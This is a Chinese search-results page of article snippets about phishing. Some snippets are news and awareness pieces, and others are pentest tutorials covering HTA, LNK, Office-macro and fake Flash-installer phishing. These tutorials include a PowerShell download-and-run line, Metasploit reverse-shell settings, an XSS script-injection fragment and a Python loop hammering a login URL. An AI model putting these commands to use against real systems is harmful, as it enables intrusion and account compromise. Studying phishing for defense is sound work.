- 综合排序
- 最热优先
- 最新优先
- 来自专栏公共互联网反网络钓鱼(APCN)
全球网络钓鱼动态简报(2025年6月)
Haozi重出江湖:让网络犯罪变得简单的钓鱼即服务平台臭名昭著的钓鱼即服务平台(PhaaS)Haozi开始重新活跃,为网络犯罪分子提供一站式钓鱼攻击服务。 Glitch平台被滥用于钓鱼活动,可绕过MFA并针对信用合作社攻击者正在滥用Glitch开发平台发起钓鱼攻击,特别针对信用合作社客户。 钓鱼即服务:基于订阅的网络犯罪正兴起钓鱼即服务(PhaaS)模式正在网络犯罪领域迅速普及,为技术能力有限的攻击者提供了发起复杂钓鱼活动的途径。 安全专家警告,这一趋势正在显著降低发起钓鱼攻击的门槛。Capital One银行客户成为凭证收集钓鱼活动目标Capital One银行客户正面临一场大规模凭证收集钓鱼活动。 供稿:北京中科易安科技有限公司(公共互联网反网络钓鱼成员单位)编辑:芦笛(公共互联网反网络钓鱼工作组)
25210编辑于 2025-10-09 - 来自专栏安恒信息
iPhone6发布在即,需警惕钓鱼邮件
近日,国外媒体发布报告,确认苹果将在9月9日发布iPhone6。监测发现,有网络不法分子打着iPhone6的幌子,采用垃圾邮件、网络钓鱼等手段试图骗取用户的信息与钱财。 专家提醒用户无论是购买iPhone6或是了解相关信息,都尽量选择官方渠道,以免遭损失。 现在已经出现了伪装成苹果官方邮件的网络钓鱼邮件-不法分子在邮件中伪造iPhone6上市通知信息,吸引用户点击。用户一旦点击,即会被诱至钓鱼网站,并被要求提供姓名、联系方式等个人信息。 因此,随着iPhone6上市时间的临近,我们可能会看到更多以iPhone6为诱饵的攻击,攻击形式也会更加多样。 可以预见的一个严重威胁是,他们会利用用户对低价产品的青睐,制作宣称可以低价甚至免费获取iPhone6的钓鱼网页,以骗取用户钱财。” 要防范此类威胁,一个重要的方式便是仔细甄别收到的信息。
61890发布于 2018-04-11 - 来自专栏网络安全攻防
社工钓鱼之WIFI钓鱼
文章前言 本篇文章我们主要介绍常见的几种WIFI钓鱼方法与具体的实现 钓鱼实践 WiFi-Pumpkin 框架介绍 WiFi-Pumpkin是一款专用于无线环境渗透测试的框架,该工具可以伪造AP以完成中间人攻击 框架使用 Step 1:执行以下命令启动框架(笔者发现目前PyQt4已经不再支持了,所以这里借用之前师傅们的几张图片) sudo wifi-pumpkin Step 2:点击界面中的设置,设置钓鱼 AP和密码,点击start即可开始 Step 3:点击start后我们可以看到钓鱼WiFi已经开启,连接钓鱼wifi在home界面可以看到当前连接的设备 Step 4:点击images-cap选项卡即可看到对方访问网站的图片 Wifiphisher还可用于针对连接的客户端发起受害者定制的网络钓鱼攻击,以获取凭据(例如,来自第三方登录页面或WPA/WPA2预共享密钥)或用恶意软件感染受害者站点。 ,同时密码被保存到本地 之后原先的钓鱼AP消失: 之后可以正常访问网络: 文末小结 本篇文章主要给大家介绍了如何通过WIFI钓鱼的方式来捕获用户的通讯数据包,以及钓取WIFI的真实密码信息,在真实场景中需要结合使用
2.9K10编辑于 2023-08-10 - 来自专栏网络安全攻防
社工钓鱼之HTA钓鱼
钓鱼实践 Step 1:新增listener Step 2:选择"Attacks—>packages—>HTML application" Step 2:选择Powershell,之后点击"Generate 3:保存载荷 Step 4:之后以邮件或者社交软件(例如:QQ、微信)的方式发送给第三方用户,并诱导其进行点击操作 PS:本来想使用ChatGPT来生成一段关于诱导用户点开evil.hta文件的钓鱼话术 Step 5:成功返回会话 文末小结 本篇文章我们介绍了HTA钓鱼的基本流程,在实战中可以通过社交软件或者邮件的方式发送给受害者用户进行执行并获取权限
1.1K30编辑于 2023-05-12 - 来自专栏网络安全攻防
社工钓鱼之LNK钓鱼
文章前言 LNK文件是一种用于指向其他文件的特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell 命令 钓鱼实践 Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,在弹出的对话框中将type类型设置为Powershell,然后单击launch '+ $file $Shortcut.Save() Step 4:运行Al1ex.ps1,之后生成LNK文件 Step 5:后将Al1ex.lnk发送给受害者,诱导用户运行 Step 6: 之后成功获得Shell 文末小结 基于LNK文件的钓鱼方式总体而言利用难度相对有点大,一般都需要通过钓鱼邮件的方式(例如:投递压缩包并附加Link文件)进行利用,不过作为一种后渗透阶段权限维持的方式也还是挺不错的
2.4K20编辑于 2023-05-12 - 来自专栏网络安全攻防
社工钓鱼之Office钓鱼(上)
metasploit的监听模块进行监听,设置响应载荷以及监听IP Step 5:将恶意rtf文件发送到靶机上,当恶意文件被执行后,msf监听到反弹shell,然后建立会话连接,即可获取靶机控制权 Step 6: MSF设置攻击IP,准备接受反弹shell Step 3:执行exploit进行监听 Step 4:制作payload文档 Step 5:之后将exp.doc发送给用户并诱导用户打开 Step 6: exploit.py generate test/shell.dll http://192.168.174.128 Step 4:使用MSF监听载荷 Step 5:启动服务托管载荷 Step 6: 将恶意docx文件发送给受害者主机并诱导其打开 请求记录: 之后成功获取到Shell 文末小结 本篇文章对Office钓鱼进行了简单介绍,从上面可以发现在Office钓鱼中大部分情况都需要用户进行交互 ,例如:点击启用宏或者更新数据文档,这无疑会增加用户的怀疑,在社工钓鱼中药特别注意
92330编辑于 2023-05-26 - 来自专栏网络安全攻防
社工钓鱼之Office钓鱼(下)
A0 之后模拟用户打开Excel文件: 发现载荷成功执行: 钓鱼实践 这里使用MSF框架来实施攻击: use exploit/windows/misc/hta_server msf exploit set PAYLOAD windows/x64/meterpreter/reverse_tcp msf > exploit Step 5:将恶意ppt文件发送给受害者用户并诱导其打开文档 Step 6:
78720编辑于 2023-05-26 - 来自专栏网络安全攻防
社工钓鱼之Office钓鱼(中)
文章前言 本篇文章我们主要介绍Office在钓鱼中常见的应用与技巧 钓鱼实践 Office Macro 实验说明 Office宏,译自英文单词Macro,宏是微软公司为其OFFICE软件包设计的一个特殊功能 在本小节中,我们的目的是构造一个存在恶意宏代码的简历文件并将其投放给HR,通过钓鱼控制目标主机 实验步骤 Step 1:首先准备一份简历 Step 2:使用CS生成恶意宏代码 Step 3:弹出界面选择 简历中插入恶意宏代码,首先转到"视图->宏->查看宏' 之后新建宏名——shell 清空所有代码,然后将复制的代码粘贴到编辑器中 之后将其保存为启用宏的word文档,这里选择"否" Step 6: raw=true Step 4:接下来将刚才解压生成的文件压缩回去: Step 5:将生成的压缩文件改名为后缀名为docx的文件 Step 5:将生成的恶意文件用邮箱钓鱼、qq或微信文件发送给受害者 Net.WebClient).DownloadString('http://192.168.174.129:1234/shell.ps2') " Step 5:将简历发送给受害者用户并诱导其打开 Step 6:
1K30编辑于 2023-05-26 - 来自专栏FreeBuf
用数学符号绕过反钓鱼检测,这届黑产有点6
网络钓鱼造成的损失被比勒索软件和BEC损失的总和还多。 钓鱼邮件之猖獗可见一斑。 用数字符号规避钓鱼检测 面对日益频发的钓鱼邮件攻击,不少企业开始部署各种反钓鱼邮件的工具和解决方案,而攻击者们则是想尽办法来规避这些反钓鱼邮件检测。 安全人员对此次钓鱼邮件攻击事件复盘之后发现,钓鱼邮件并未使用多少新的技术,而是对邮件进行了高超的“伪装”。 攻击者用更加巧妙的手段,瞒过了企业反钓鱼邮件的检测,也瞒过了很多粗心的用户。 如何有效预防钓鱼邮件? 4、安装反钓鱼邮件工具,目前很多杀毒软件和浏览器都包含了反钓鱼邮件工具,这可以帮我们拦截大多数钓鱼邮件,并且会有相应的提醒。
84330发布于 2021-10-21 - 来自专栏信安之路
网页表单钓鱼以外的钓鱼方法
——(中)沃兹基索德 钓鱼式攻击 顾名思义,是一种如同钓鱼一样的攻击,是一种安逸的很的攻击方式。 搜狗百科是给出来比较容易理解的网络钓鱼的定义。 网络钓鱼 (Phishing)攻击者利用欺骗性的电子邮件和伪造的 Web 站点来进行网络诈骗活动,受骗者往往会泄露自己的私人资料,如信用卡号、银行卡账户、身份证号等内容。 可以看出,钓鱼攻击并不是一种完全随缘的攻击方法。关键在于是否成功伪装成了受害者信任的目标。
80700发布于 2018-08-08 - 来自专栏HACK学习
钓鱼攻击:Gophish邮件钓鱼平台搭建
在Campaigns中,可以新建钓鱼事件,并选择编辑好的钓鱼邮件模板,钓鱼页面,通过配置好的发件邮箱,将钓鱼邮件发送给目标用户组内的所有用户。 当URL填写了http://主机IP/,并成功创建了当前的钓鱼事件后,Gophish会在主机的81端口部署当前钓鱼事件所选定的钓鱼页面,并在发送的钓鱼邮件里,将其中所有的超链接都替换成部署在81端口的钓鱼页面的 设置myorigin myorigin = $mydomain # 默认是localhost,修改成all inet_interfaces = all # 推荐ipv4,如果支持ipv6, myhostname ESMTP (4)安装mailx软件包 apt-get install mailutils (5)启动postfix服务 systemctl start postfix (6) https://blog.csdn.net/qq_42939527/article/details/107485116 http://blog.leanote.com/post/snowming/a6b66097bccd
21.4K32发布于 2021-03-03 - 来自专栏Khan安全团队
flash钓鱼
准备钓鱼套件https://github.com/r00tSe7en/Flash-Pop 美化版 https://github.com/hackxc/xss_flash 普通版 1.生成木马并捆绑flash 的安装程序 将木马与flash安装程序捆绑一起 木马解压位置:windows的自启动目录,这个百度钓鱼钓时间长就知道了。 5、修改一下version.js文件中的链接,为自己的钓鱼页面。(主要与XSS直接配合使用) 6、我比较喜欢用宝塔,我们新建一个站点,填好域名,改为静态后,将源码放入对应的网站目录下。 没有服务器和域名怎么办 http://www.webweb.com/ 香港云可以白嫖 7、下面开始钓鱼 如果你想利用XSS钓鱼 可以使用src标签 构造payload:<scriptsrc="http 我们找一个存在XSS的网站,在存在异常的参数位置,输入构造的payload,点击确定后,就会跳转到我们<em>钓鱼</em>页面。 8、对方下载安装后,成功上线。
4.2K30发布于 2021-08-26 - 来自专栏黑客技术家园
Unicode钓鱼
各种高大上的金融操作暂且不论,这次主要侃侃事发源头——Unicode钓鱼。 二、有哪些姿势“钓鱼” 先说下钓鱼,钓鱼就是三步走:准备诱饵,放到水里,坐等鱼上钩。 对比学习下网站钓鱼: 【准备诱饵】 开发仿冒的网站域名,欺骗用户。举几个例子就明白了: 1、链接欺骗 经常会看到这样的钓鱼信息:恭喜您的淘宝账号中奖了,奖品是Iphone X一台! 三、此次Unicode钓鱼是怎样实现的 也许大家会奇怪,币安上不是有二次认证(手机短信或谷歌认证),那是怎么绕过的,答案是自动交易程序。 四、Unicode钓鱼模拟攻击 下面将通过仿冒 ape.com这个网站和其域名,来模拟Unicode钓鱼。 官网网站域名:ape.com 仿冒网站域名:◤аре.com◢ 其中,前者的“ аре ”和后者的 “ ape ” 三个字母虽然看上去一样,但对于计算机来说都不一样,6个字母的编码如下表所示: 1、
1.9K50编辑于 2023-03-25 - 来自专栏网络安全攻防
社工钓鱼之钓鱼网站
文章前言 在社工钓鱼过程中,网站钓鱼是一种较为常见的钓鱼方式,比较常见的思路有以下几种: 第一种:通过购买服务器以及域名自我架设钓鱼网站,之后投放钓鱼网站页面给受害者并诱导其进行认证来窃取用户凭证,更有甚者可以在获取到网站的源码的情况下克隆一个类似的网站 Update the Social-Engineer Toolkit //更新软件 5) Update SET configuration //更新配置 6) Payload and Listener //建立payload和listener 5) Mass Mailer Attack //邮件群发攻击 6) //网站jacking攻击 6) Multi-Attack Web Method //多种网站攻击 7) HTA Attack Method 3) Custom Import //自定义的网站 99) Return to Webattack Menu Step 5:选择"Web Templates" Step 6:
2.4K10编辑于 2022-06-23 - 来自专栏ConsT27的笔记
钓鱼技术
文件是从不安全的位置打开的 文件被文件块阻止 文件验证失败 文件是使用“在受保护的视图中打开”选项打开的 文件是从其他人的 OneDrive 存储中打开的 XLM / Macro 4.0 (excel宏钓鱼 但在某些情况下打开此类excel文件需手动点击启用宏才能正常钓鱼。 <title>Mousejack replay</title><head></head><body> command exec <OBJECT id=x classid="clsid:adb880a<em>6</em>-
3.9K30编辑于 2022-02-11 - 来自专栏腾讯安全
钓鱼简史
这正是最初阶段的网络钓鱼的手法,钓鱼者伪装身份骗取用户的信息。在获得了用户账户后,钓鱼者可以利用受害人的账户进行诈欺或者发送垃圾邮件。 网络钓鱼做嫁衣,向关键基础设施进行勒索攻击 最初的“钓鱼”,只是想通过盗窃的方式获取用户信息,以此牟利,但“盗窃”往往不会百分百奏效。为了获取更大的“利益”,网络钓鱼开始与勒索软件捆绑在一起。 尽管WannaCry勒索病毒并非使用钓鱼邮件,而是通过漏洞攻击蠕虫。但是这个案例给了网络钓鱼“新的启发”。 已知网络钓鱼的13种常见类型: 第1类:网络钓鱼:普通群发电子邮件 第2类:鱼叉式网络钓鱼:追求特定目标 第3类:捕鲸:追逐大家伙 第4类:商业电子邮件诈骗:冒充领导 第5类:克隆钓鱼:来自真实的复制 第6类:语音网络钓鱼:通过电话进行网上诈骗 第7类:短信欺诈:通过短信钓鱼 第8类:雪靴:传播骚扰讯息 第9类:灯笼式钓鱼:飞蛾扑火的欺骗 第10类:域名欺骗 :相仿的域名 第11类:恶意孪生:假冒WiFi
1.1K30编辑于 2022-05-05 - 来自专栏默认分类
爆锤钓鱼
import requests user1 = 0 while 1<2: `user1 = user1 + 1 url = "http://vsssw222.6660606.cn/wap/login.php" data = { "u": f"{user1}", "p": "qq2962283762", "step": "1" }` resp = requests.post(url,data=data) resp.encoding = 'utf-8' print("执行了
48130编辑于 2023-02-14 - 来自专栏kali blog
Office宏钓鱼
在实际渗透中,我们常用office宏钓鱼来获取目标设备的权限。尤其是在红蓝对抗中,这使得office宏也是最佳社会工程攻击最有效的手段之一。 本文将为你演示在kali中如何配置office宏钓鱼。 注意:本文仅供学习和研究,请勿非法攻击。造成法律后果,和本文无关。 实验环境 kali2022 office word2019 生成宏 启动CS-攻击-office钓鱼 选择相应的监听后,点击生成。
1K40编辑于 2022-09-19 钓鱼邮件攻击
钓鱼邮件攻击【实验目的】通过Measploit生成msi命名为java的JDK,上传至DMZ区门户网站1的服务器,并诱使用域用户放下戒备,下载安装可信任文件,了解并掌握钓鱼邮件的原理。 【知识点】钓鱼邮件【实验原理】钓鱼邮件指利用伪装的电邮,欺骗收件人将账号、口令等信息回复给指定的接收者;或引导收件人连接到特制的网页,这些网页通常会伪装成和真实网站一样,如银行或理财的网页,令登录者信以为真 3.利用xiaowang用户编写钓鱼邮件发送给xiaozhang用户。4.模拟域用户xiaozhang下载安装执行木马。5.开启Meaploit监听返回shell。 6.开启Meaploit监听返回shell选择拓扑图中左下方的【攻击机2-Windows】,按右键,在弹出的菜单中选择【控制台】,登录【攻击机2-Windows】界面。 【实验结论】通过上述操作,Measploit生成msi命名为java的JDK,上传至DMZ区门户网站1的服务器,并诱使用域用户放下戒备,下载安装可信任文件,了解并掌握钓鱼邮件的原理,符号实验预期。
26632编辑于 2025-11-30- 来自专栏黑白天安全团队
Gophish钓鱼测试
wulaoban 社工 2020-06-30 Gophish 是一个功能强大的开源网络钓鱼框架,可以轻松测试组织的网络钓鱼风险,专为企业和渗透测试人员设计 1.下载与安装 官网:https://getgophish.com 编辑email template 这个是用来编辑钓鱼邮件的模板 我们可以导入钓鱼模板 ? landing pages设置钓鱼页面 用来获取用户名和密码 ? 可以看到发送成功,成功送达目标邮箱 还可以伪造任意x-mailer头 (如果不设置的话默认是gophish) x-mailer头表示邮件从哪个客户端发出来的 Campaign 这个就是用来发送钓鱼攻击的地方 可以看到邮件里面的链接都被替换成我们的钓鱼网站 ? 模拟用户输入账号密码 点击提交后跳转去正确的github页面 ? 可以看到平台已经接受到用户打开邮件 输入账号密码的时间了 ? ? 钓鱼成功!
1.7K20发布于 2020-07-23
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号